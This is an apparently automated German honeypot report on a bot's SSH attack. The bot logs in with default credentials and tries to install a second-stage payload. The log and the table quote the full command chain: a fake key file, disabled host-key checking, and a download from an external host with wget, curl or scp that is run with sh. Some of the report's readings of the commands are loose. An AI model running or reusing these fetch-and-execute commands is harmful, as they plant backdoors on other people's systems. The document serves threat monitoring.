29.09.2026 · Malware-Dropper · 3 Anfragen · Dauer keine Angabe · Niederlande
3 verschiedene Sitzungen (3 Durchläufe) von 1 IPs, Länder: NL (3). Dienst: ssh/22. Immer dieselbe Kommandofolge, daher ein Bot bzw. eine Bot-Familie.
auth_ok
user='admin' pass='admin' admin@srv01:~$ uname -a; echo -e "\x61\x75\x74\x68\x5F\x6F\x6B\x0A"; cd /tmp || cd /var/tmp || cd /dev/shm; echo '-----BEGIN OPENSSH PRIVATE KEY----- Linux router 5.4.179 #0 SMP PREEMPT mips GNU/Linux auth_ok -----BEGIN OPENSSH PRIVATE KEY----- auth_ok '-----BEGIN OPENSSH PRIVATE KEY----- admin@srv01:~$ [Token] bash: [Token]: No such file or directory admin@srv01:~$ [Token] bash: [Token]: No such file or directory admin@srv01:~$ [Token] bash: [Token]: No such file or directory admin@srv01:~$ [Token] bash: [Token]: No such file or directory admin@srv01:~$ [Token] bash: [Token]: No such file or directory admin@srv01:~$ -----END OPENSSH PRIVATE KEY-----' > key.ppk; echo 'StrictHostKeyChecking no bash: syntax error near unexpected token `newline' 'StrictHostKeyChecking no admin@srv01:~$ UserKnownHostsFile /dev/null' > sshcfg; chmod 400 key.ppk; scp -s -F sshcfg -i key.ppk [E-Mail]:sh out_sh; if [ $? -eq 0 ]; then chmod +x out_sh; sh out_sh ssh >/dev/null 2>&1; else (wget --no-check-certificate -qO- https://[IP]/sh || curl -sk https://[IP]/sh) | sh -s ssh; fi; rm -rf sshcfg key.ppk out_sh scp: invalid option -- 's' usage: scp [-12346Cpqrv] [-B buffer_size] [-E tag_file] [-F ssh_config] [-i identity_file] [-J destination] [-l limit] [-o ssh_option] [-P port] [-S program] source ... target
Der Angreifer führte drei Sitzungen durch, in denen er sich mit den Standardzugangsdaten admin:admin anmeldete. Nach der erfolgreichen Authentifizierung erstellte er im temporären Verzeichnis eine Datei mit einem vorgetäuschten SSH-Schlüssel. Anschließend konfigurierte er SSH so, dass Host-Prüfungen übersprungen werden, und versuchte, eine Datei von einem externen Server herunterzuladen. Bei Erfolg sollte diese Datei ausgeführt werden, andernfalls wurde ein alternativer Download über wget eingeleitet.
Der Befehl uname -a liefert Systeminformationen zur Identifikation der Umgebung. Der Echo-Befehl schreibt eine Hexadezimal-Kette, die dem String auth_ok entspricht, was als Bestätigung der Anmeldung dient. Die cd-Befehle wechseln in beschreibbare temporäre Verzeichnisse wie /tmp, um Schreibrechte zu umgehen. Die mehrzeilige Echo-Anweisung erzeugt eine Datei namens key.ppk, die jedoch keinen echten Schlüssel enthält, sondern als Platzhalter oder Tarnung dient. Die Datei sshcfg deaktiviert die strenge Host-Key-Prüfung, um Man-in-the-Middle-Angriffe oder Warnungen zu umgehen. Der scp-Befehl versucht, eine Datei namens out_sh vom externen Server zu kopieren, und führt sie bei Erfolg mit sh aus, was zur Ausführung beliebigen Codes führt.
Das Ziel war die Installation einer Backdoor oder eines Botnet-Agents auf dem kompromittierten System. Dies erkennt man an der Kombination aus Brute-Force-Anmeldung, dem Anlegen von SSH-Konfigurationsdateien und dem Versuch, einen zweiten Payload aus dem Internet nachzuladen. Der fehlgeschlagene Nachladen-Versuch deutet darauf hin, dass der eigentliche Schadcode nicht ausgeführt wurde.
Dieses Muster ist ein typischer, automatisierter Dropper-Angriff, der häufig in Botnetzen zur Massenkompromittierung von IoT-Geräten oder schwach gesicherten Servern eingesetzt wird.
| Zeit | Methode | Pfad / Payload | Muster |
|---|---|---|---|
| +0 s | CMD | uname -a; echo -e "\x61\x75\x74\x68\x5F\x6F\x6B\x0A"; cd /tmp || cd /var/tmp || cd /dev/shm; echo '-----BEGIN OPENSSH PRIVATE KEY----- | |
| +0 s | CMD | [Token] | |
| +0 s | CMD | -----END OPENSSH PRIVATE KEY-----' > key.ppk; echo 'StrictHostKeyChecking no | |
| +0 s | CMD | UserKnownHostsFile /dev/null' > sshcfg; chmod 400 key.ppk; scp -s -F sshcfg -i key.ppk [E-Mail]:sh out_sh; if [ $? -eq 0 ]; then chmod +x out_sh; sh out_sh ssh >/dev/null 2>&1; else (wget --no-check-certificate -qO- https://[IP]/sh || curl -sk https://[IP]/sh) | sh -s ssh; |